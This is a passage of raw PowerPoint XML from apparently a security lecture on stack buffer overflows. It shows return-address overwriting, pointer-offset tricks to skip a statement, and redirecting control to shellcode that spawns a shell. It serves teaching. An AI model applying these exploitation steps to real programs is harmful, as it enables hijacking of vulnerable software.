            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The return address becomes 0x41414141.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>When the function returns, there will be a segmentation fault as that address does not belong to this process (most probably)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13321" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="152400"/>
            <a:ext cx="11557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2000"/>
              <a:t>Lower</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13322" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4419600"/>
            <a:ext cx="11557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2000"/>
              <a:t>Higher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>addresses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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>What is the trick?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1524000"/>
            <a:ext cx="6096000" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Buffer overflow allows us to change the return address of a function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>ret = buffer1 + 12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>   the pointer *ret is now pointing to the return address of the function (ret in the diagram).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>(*ret) += 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>   the return address of the function is increased by 8.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Skip the assignment statement to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> call.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>The program prints 0 instead of 1.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Due to different computer configurations, the following is used for our current machines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>ret = buffer1 + 28</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>(*ret) += 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="14340" name="Object 4">
            <a:hlinkClick r:id="" action="ppaction://ole?verb=1"/>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2653430807"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4038600" y="2300288"/>
          <a:ext cx="914400" cy="714375"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s14410" name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Object 4"/>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="4038600" y="2300288"/>
                        <a:ext cx="914400"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341" name="Group 34"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6934200" y="1752600"/>
            <a:ext cx="2144713" cy="2667000"/>
            <a:chOff x="4368" y="1104"/>
            <a:chExt cx="1351" cy="1680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14345" name="Group 30"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4608" y="1104"/>
              <a:ext cx="720" cy="1680"/>
              <a:chOff x="4896" y="672"/>
              <a:chExt cx="720" cy="1680"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14349" name="Rectangle 5"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4896" y="2193"/>
                <a:ext cx="720" cy="159"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0099FF"/>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c</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14350" name="Rectangle 6"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4896" y="2034"/>
                <a:ext cx="720" cy="159"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0099FF"/>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b</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14351" name="Rectangle 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4896" y="1875"/>
                <a:ext cx="720" cy="159"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0099FF"/>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a</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14352" name="Rectangle 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4896" y="1716"/>
                <a:ext cx="720" cy="159"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFCC00"/>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ret</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14353" name="Rectangle 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4896" y="1558"/>
                <a:ext cx="720" cy="158"/>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sfp</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14354" name="Rectangle 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4896" y="1266"/>
                <a:ext cx="720" cy="292"/>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buffer1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14355" name="Rectangle 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4896" y="816"/>
                <a:ext cx="720" cy="450"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="00CC66"/>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buffer2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14356" name="Rectangle 29"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4896" y="672"/>
                <a:ext cx="720" cy="159"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFCC00"/>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*ret (var)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14346" name="Freeform 31"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4368" y="1200"/>
              <a:ext cx="193" cy="975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 250"/>
                <a:gd name="T1" fmla="*/ 0 h 1056"/>
                <a:gd name="T2" fmla="*/ 0 w 250"/>
                <a:gd name="T3" fmla="*/ 5 h 1056"/>
                <a:gd name="T4" fmla="*/ 2 w 250"/>
                <a:gd name="T5" fmla="*/ 1056 h 1056"/>
                <a:gd name="T6" fmla="*/ 2 w 250"/>
                <a:gd name="T7" fmla="*/ 1056 h 1056"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 60000 65536"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 w 250"/>
                <a:gd name="T13" fmla="*/ 0 h 1056"/>
                <a:gd name="T14" fmla="*/ 250 w 250"/>
                <a:gd name="T15" fmla="*/ 1056 h 1056"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T8">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T9">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T10">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T12" t="T13" r="T14" b="T15"/>
              <a:pathLst>
                <a:path w="250" h="1056">
                  <a:moveTo>
                    <a:pt x="249" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="1056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250" y="1056"/>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47" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5318" y="1751"/>
              <a:ext cx="39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1200"/>
                <a:t>8 bytes</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14348" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5328" y="1987"/>
              <a:ext cx="39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1200"/>
                <a:t>4 bytes</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14342" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7988300" y="685800"/>
            <a:ext cx="11557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2000"/>
              <a:t>Lower</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14343" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7988300" y="4495800"/>
            <a:ext cx="11557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2000"/>
              <a:t>Higher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14344"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5808CF93-F8A8-446B-94C8-579EE4CA9E7B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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685800" y="457200"/>
            <a:ext cx="7772400" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>By using a similar technique, a hacker can change the return address, so that the control flow will pass to the hacker’s desired code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>The code will be run under the username of the owner of the program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Usually the hacker wants to have a shell to issue some commands later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>The machine code to generate a shell is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Read the article by Aleph One, to see how the shell code is obtained.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Here is an example to test the shellcode.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="15363" name="Object 4">
            <a:hlinkClick r:id="" action="ppaction://ole?verb=1"/>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="796671828"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7048500" y="5606160"/>
          <a:ext cx="914400" cy="714375"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s15413" name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Object 4"/>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="7048500" y="5606160"/>
                        <a:ext cx="914400"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4"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017CC981-6AB9-4932-A1D5-678B24C8D28B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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762000" y="914400"/>
            <a:ext cx="5334000" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>How can we make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> (in the diagram) point to the shellcode?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Note that:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *)&amp;ret + 2;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>is actually adding 8 bytes to &amp;ret. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>So that the *ret (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>) pointer will point to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>ret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>in the diagram</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>After that, the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(*ret) = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)shellcode;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
